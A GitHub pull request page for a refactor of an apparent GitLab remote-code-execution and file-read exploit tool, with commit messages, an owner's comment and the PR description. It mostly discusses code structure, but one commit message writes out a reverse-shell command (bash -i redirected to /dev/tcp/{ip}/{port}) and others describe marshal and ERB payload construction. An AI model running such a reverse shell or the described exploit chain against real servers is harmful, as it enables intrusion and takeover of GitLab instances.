Refactor: modularize gitlab_rce codebase into clean src/ structure following best practices#1
Open
LinuxUser255 wants to merge 8 commits into
Open
Refactor: modularize gitlab_rce codebase into clean src/ structure following best practices#1LinuxUser255 wants to merge 8 commits into
LinuxUser255 wants to merge 8 commits into
Conversation
Break gitlab_rce-refactor.py into a proper Python package under src/
with a minimal main.py entry point.
Structure
---------
src/
client.py — GitlabClient replaces the GitlabRCE base class;
all exploits receive it via composition
parsers.py — extracted GitlabParse, ProjectIDParse, VersionParse
version.py — detect_version() function replaces GitlabVersion subclass
runner.py — CLI menu and dispatch; absorbs GitlabRCE1281LFIUser
exploits/
rce_1147.py — RCE1147(client); no inheritance
lfi_1281.py — LFI1281(client, path); read_file() returns contents
rce_1281.py — RCE1281(client); uses LFI1281 via composition,
eliminating the RCE→LFI→base inheritance chain
Design decisions
----------------
- Composition over inheritance throughout; no multiple inheritance
- GitlabRCE1281LFIUser deleted (was a subclass just for one input() call)
- create_empty_project() returns the project name so exploit logic
does not depend on client.projects list ordering across runs
- Marshal template and Redis template extracted as module-level constants
- PEP 8 pass on refactor file: f-strings, dict formatting, super(),
import ordering, line lengths, slice spacing
Also added
----------
- .gitignore (Python standard + project-specific loot/output dirs)
- requirements.txt
- README.md cleanup: CVE table, NVD links, updated usage
…x shell command
- Removed _MARSHAL_TEMPLATE and _length_byte entirely
- Build payload as raw byte concatenation (no templates, no escaping,
no manual length calculation)
- Use single-quoted shell command: /bin/sh -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'
to prevent quoting issues with /bin/sh
- Rest of the code (run loop, _deliver, _parse_secret_key, class structure)
remains unchanged
Owner
|
Thank you for you PR. 2 hours between fork and pull request is quite a feat to refactor the whole project while keeping the functionality untouched. I have a few questions
|
- Use compiled ERB bytecode instead of raw template syntax - Calculate length byte dynamically (src_len + 5) - Use bash -c explicitly for fd redirection support - Add exploit-dev/ directory with annotated analysis scripts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
2 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
PR: Refactor monolithic script into clean, modular codebase with separation of concerns
Refactored the entire codebase by breaking the large
gitlab_rce-refactor.pyinto a well-structured, maintainable Python package undersrc/, following best practices.Key Changes
src/layout and minimalmain.pyentry pointclient.py,parsers.py,version.py,runner.pyexploits/subpackage (each exploit now uses composition)GitlabRCE1281LFIUserand simplified the RCE → LFI inheritance chain.gitignore,requirements.txt, and cleaned up README.mdThe original functionality remains unchanged — only structure, readability, and maintainability were improved.
The original README.md mentioned that this script “needs a HUGE refactor some time in the future.” Refactoring codebases is something I enjoy doing from time to time, so I went ahead and gave it a go.
Hope this helps! The code is now much cleaner and more maintainable. Still needs some work on popping shells, but the improved formatting and separation of concerns should make future enhancements and scalability much easier.
This refactor was guided by the Python Best Practices along with DRY, KISS, SOLID principles, and the Zen of Python.